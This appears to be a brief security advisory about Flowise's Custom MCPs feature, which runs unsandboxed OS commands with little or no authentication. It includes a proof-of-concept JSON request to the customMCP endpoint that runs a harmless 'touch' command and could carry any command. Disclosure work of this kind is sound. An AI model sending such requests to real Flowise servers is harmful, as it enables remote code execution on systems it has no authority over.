Unsupervised OS command execution leads to remote code execution by network attackers
(,)
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like npx to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in certain Flowise versions the default installation operates without authentication unless explicitly configured. This combination allows either unauthenticated or authenticated users to execute unsandboxed OS commands.
Send the following payload to the node-load-method/customMCP API endpoint -
{
"inputs":
{
"mcpServerConfig":
{
"command": "touch",
"args":
[
"/tmp/yofitofi"
]
}
},
"loadMethod": "listActions"
}
No mitigations are supplied for this issue